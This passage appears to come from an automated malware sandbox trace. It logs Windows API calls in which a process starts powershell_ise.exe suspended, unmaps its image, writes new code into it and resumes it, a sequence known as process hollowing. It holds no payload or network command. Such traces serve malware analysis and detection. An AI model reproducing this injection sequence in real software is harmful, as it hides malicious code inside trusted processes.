lpApplicationName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe", lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19e64c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19eeec | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe\"", lpProcessInformation=0x19eeec*(hProcess=0x2a4, hThread=0x2a0, dwProcessId=0x1188, dwThreadId=0x1184)) returned 1 [0146.513] CoTaskMemFree (pv=0x0) [0146.521] GetThreadContext (in: hThread=0x2a0, lpContext=0x2348f7c | out: lpContext=0x2348f7c*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x253000, Edx=0x0, Ecx=0x0, Eax=0x41390e, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0146.521] ReadProcessMemory (in: hProcess=0x2a4, lpBaseAddress=0x253008, lpBuffer=0x19ee78, nSize=0x4, lpNumberOfBytesRead=0x19ee74 | out: lpBuffer=0x19ee78*, lpNumberOfBytesRead=0x19ee74*=0x4) returned 1 [0146.522] NtUnmapViewOfSection (ProcessHandle=0x2a4, BaseAddress=0x400000) returned 0x0 [0146.532] VirtualAllocEx (hProcess=0x2a4, lpAddress=0x400000, dwSize=0x3a000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0146.534] WriteProcessMemory (in: hProcess=0x2a4, lpBaseAddress=0x400000, lpBuffer=0x32fe950*, nSize=0x200, lpNumberOfBytesWritten=0x19ee74 | out: lpBuffer=0x32fe950*, lpNumberOfBytesWritten=0x19ee74*=0x200) returned 1 [0146.563] WriteProcessMemory (in: hProcess=0x2a4, lpBaseAddress=0x402000, lpBuffer=0x3332d70*, nSize=0x33c00, lpNumberOfBytesWritten=0x19ee74 | out: lpBuffer=0x3332d70*, lpNumberOfBytesWritten=0x19ee74*=0x33c00) returned 1 [0146.642] WriteProcessMemory (in: hProcess=0x2a4, lpBaseAddress=0x436000, lpBuffer=0x2349254*, nSize=0x400, lpNumberOfBytesWritten=0x19ee74 | out: lpBuffer=0x2349254*, lpNumberOfBytesWritten=0x19ee74*=0x400) returned 1 [0146.652] WriteProcessMemory (in: hProcess=0x2a4, lpBaseAddress=0x438000, lpBuffer=0x2349660*, nSize=0x200, lpNumberOfBytesWritten=0x19ee74 | out: lpBuffer=0x2349660*, lpNumberOfBytesWritten=0x19ee74*=0x200) returned 1 [0146.670] WriteProcessMemory (in: hProcess=0x2a4, lpBaseAddress=0x253008, lpBuffer=0x234986c*, nSize=0x4, lpNumberOfBytesWritten=0x19ee74 | out: lpBuffer=0x234986c*, lpNumberOfBytesWritten=0x19ee74*=0x4) returned 1 [0146.678] SetThreadContext (hThread=0x2a0, lpContext=0x2348f7c*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x253000, Edx=0x0, Ecx=0x0, Eax=0x435bce, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0146.679] ResumeThread (hThread=0x2a0) returned 0x1 [0146.825] CoGetContextToken (in: pToken=0x19f340 | out: pToken=0x19f340) returned 0x0 [0146.825] CObjectContext::QueryInterface () returned 0x0 [0146.825] CObjectContext::GetCurrentThreadType () returned 0x0 [0146.825] Release () returned 0x0 [0146.826] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x13880, cHandles=0x1, pHandles=0x4be058*=0x14c, lpdwindex=0x19f1e4 | out: lpdwindex=0x19f1e4) returned 0x0 Thread: id = 48 os_tid = 0x4e8 Thread: id = 49 os_tid = 0x1050 Thread: id = 50 os_tid = 0x106c [0119.735] CoGetContextToken (in: pToken=0x435fc74 | out: pToken=0x435fc74) returned 0x800401f0 [0119.736] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0119.736] RoInitialize () returned 0x1 [0119.736] RoUninitialize () returned 0x0 [0141.384] CloseHandle (hObject=0x430) returned 1 [0141.384] CertFreeCertificateContext (pCertContext=0x543370) returned 1 [0141.385] CloseHandle (hObject=0x3f0) returned 1 [0141.385] CloseHandle (hObject=0x3e4) returned 1 [0141.386] CertFreeCertificateContext (pCertContext=0x4f60c0) returned 1 [0141.386] CloseHandle (hObject=0x2e8) returned 1 [0141.386] CertFreeCertificateContext (pCertContext=0x4f6020) returned 1 [0141.386] CloseHandle (hObject=0x2e4) returned 1 [0141.386] CloseHandle (hObject=0x2e0) returned 1 [0141.387] CloseHandle (hObject=0x2dc) returned 1 [0141.388] CloseHandle (hObject=0x2d8) returned 1 [0141.388] CloseHandle (hObject=0x2d4) returned 1 [0141.389] CloseHandle (hObject=0x2cc) returned 1 [0141.389] CloseHandle (hObject=0x528) returned 1 [0141.389] CloseHandle (hObject=0x434) returned 1 [0141.390] CertCloseStore (hCertStore=0x51d698, dwFlags=0x0) returned 1 [0141.390] CloseHandle (hObject=0x2b8) returned 1 [0141.390] CertFreeCertificateContext (pCertContext=0x4f6020) returned 1 [0141.390] CloseHandle (hObject=0x2b4) returned 1 [0141.390] CloseHandle (hObject=0x29c) returned 1 [0141.391] CloseHandle (hObject=0x2b0) returned 1 [0141.391] CloseHandle (hObject=0x2ac) returned 1 [0141.391] CloseHandle (hObject=0x2a8) returned 1 [0141.391] CertFreeCertificateContext (pCertContext=0x4f6840) returned 1 [0141.391] CloseHandle (hObject=0x2a4) returned 1 [0141.392] CloseHandle (hObject=0x2a0) returned 1 [0147.015] SetWindowLongW (hWnd=0x2037c, nIndex=-4, dwNewLong=1944586208) returned 74384870 [0147.017] SetClassLongW (hWnd=0x2037c, nIndex=-24, dwNewLong=1944586208) returned 0x46f05be [0147.017] PostMessageW (hWnd=0x2037c, Msg=0x10, wParam=0x0, lParam=0x0) returned 1 [0147.019] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0147.020] UnregisterClassW (lpClassName="WindowsForms10.Window.8.app.0.141b42a_r10_ad1", hInstance=0x400000) returned 0 [0147.021] EtwEventUnregister () returned 0x0 [0147.021] EtwEventUnregister () returned 0x0 [0147.040] CloseHandle (hObject=0x270) returned 1 [0147.042] setsockopt (s=0x4ec, level=65535, optname=128, optval="\x01", optlen=4) returned 0 [0147.043] closesocket (s=0x4ec) returned 0 [0147.044] WinHttpCloseHandle (hInternet=0x51c8a8) returned 1 [0147.045] FreeCredentialsHandle (phCredential=0x228f190) returned 0x0 [0147.046] DeleteSecurityContext (phContext=0x228f348) returned 0x0 [0147.048] CloseHandle (hObject=0x38c) returned 1 [0147.048] CloseHandle (hObject=0x388) returned 1 [0147.048] RegCloseKey (hKey=0x384) returned 0x0 [0147.049] CloseHandle (hObject=0x380) returned 1 [0147.049] RegCloseKey (hKey=0x37c) returned 0x0 [0147.049] CloseHandle (hObject=0x378) returned 1 [0147.049] RegCloseKey (hKey=0x374) returned 0x0 [0147.050] RegCloseKey (hKey=0x370) returned 0x0 [0147.050] CloseHandle (hObject=0x358) returned 1 [0147.051] CloseHandle (hObject=0x290) returned 1 [0147.052] UnmapViewOfFile (lpBaseAddress=0x46a0000) returned 1 [0147.052] setsockopt (s=0x51c, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0147.052] closesocket (s=0x51c) returned 0 [0147.053] CloseHandle (hObject=0x520) returned 1 [0147.053] setsockopt (s=0x34c, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0147.054] closesocket (s=0x34c) returned 0 [0147.054] CloseHandle (hObject=0x350) returned 1 [0147.054] setsockopt (s=0x4f4, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0147.055] closesocket (s=0x4f4) returned 0 [0147.055] CloseHandle (hObject=0x518) returned 1 [0147.056] setsockopt (s=0x344, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0147.056] closesocket (s=0x344) returned 0 [0147.056] CloseHandle (hObject=0x348) returned 1 [0147.057] setsockopt (s=0x614, level=65535, optname=128, optval="\x01", optlen=4) returned 0 [0147.057] closesocket (s=0x614) returned 0 [0147.058] RegCloseKey (hKey=0x80000004) returned 0x0 Thread: id = 51 os_tid = 0xb98 Thread: id = 52 os_tid = 0x10d0 Thread: id = 53 os_tid = 0x10c8 [0138.508] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0138.508] RoInitialize () returned 0x1 [0138.508] RoUninitialize () returned 0x0 [0138.528] ResetEvent (hEvent=0x294) returned 1 Thread: id = 54 os_tid = 0x1074 Thread: id = 55 os_tid = 0x740 Thread: id = 56 os_tid = 0x1140 Thread: id = 57 os_tid = 0x1e0 Thread: id = 60 os_tid = 0x117c Process: id = "4" image_name = "powershell_ise.exe" filename = "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell_ise.exe" page_root = "0xa833000" os_pid = "0x1188" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0xbb4" cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT 